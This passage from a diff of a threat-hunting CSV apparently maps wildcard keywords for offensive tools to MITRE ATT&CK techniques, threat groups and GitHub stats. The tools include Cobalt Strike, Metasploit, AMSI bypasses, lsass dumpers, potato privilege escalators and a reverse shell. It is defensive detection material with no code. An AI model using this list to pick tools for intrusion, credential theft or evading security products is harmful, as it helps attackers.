TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ALPC-TaskSched-LPE.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Alphabug_CS*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*Alphabug_CS*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*AlphabugX/csOnvps*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" @@ -7184,10 +7328,10 @@ "*AMS1-Patch.exe*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AMSI patched in all powershells*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*AMSI_Bypass.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*AMSI_bypass_20*.ps1","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","983","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*AMSI_bypass_20*.ps1","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*AMSI_patch-main*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" -"*Amsi-Bypass*","offensive_tool_keyword","Github Username","This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","1325","245","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" -"*amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*Amsi-Bypass*","offensive_tool_keyword","Github Username","This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","1326","245","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" +"*amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*AmsiBypass.cs*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*Amsi-Killer.exe*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*Amsi-Killer.sln*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" @@ -7196,28 +7340,28 @@ "*AmsiOpenSession.cpp*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AmsiOpenSession.sln*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AmsiOpenSession.vcxproj*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" -"*and Credential Guard will not be bypassed*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*andotp2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*and Credential Guard will not be bypassed*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*andotp2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*AndrewSpecial.cpp*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*AndrewSpecial.exe*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*AndrewSpecial-master*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" -"*androidbackup2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*androidfde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*androidbackup2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*androidfde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*AnErrupTion/LoGiC.NET*","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","483","75","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" "*Anevicon*","offensive_tool_keyword","Anevicon","Attack simulation: Anevicon is a high-performance traffic generator. designed to be as convenient and reliable as it is possible. It sends numerous UDP-packets to a victim. thereby simulating an activity that can be produced by your end users or a group of hackers.","T1498 - T1497 - T1496","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/rozgo/anevicon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ANGRYPUPPY2.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" -"*anonsurf.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" -"*ansible2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*anonsurf.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*ansible2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*anthemtotheego/Detect-Hooks*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" -"*antirez/hping*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","1","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" -"*AntivirusBypass.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*antirez/hping*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","1","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*AntivirusBypass.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*antiword FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" -"*antonioCoco/ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*antonioCoco/ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*antonioCoco/JuicyPotatoNG*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" -"*antonioCoco/RoguePotato*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*antonioCoco/RoguePotato*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*antonioCoco/RunasCs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*antonioCoco/RunasCs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*antonioCoco/SspiUacBypass*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*antonioCoco/SspiUacBypass*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*anypotato.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*AoratosWin*.zip*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.csproj*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" @@ -7226,64 +7370,65 @@ "*AoratosWin.git*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.sln*","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin_*.zip*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" -"*apache_felix_remote_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*apache_felix_remote_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*APC_Ijnect_Load.nim*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" -"*apex2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*apfs_encrypted_volume_passwd.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*apex2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*apfs_encrypted_volume_passwd.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various 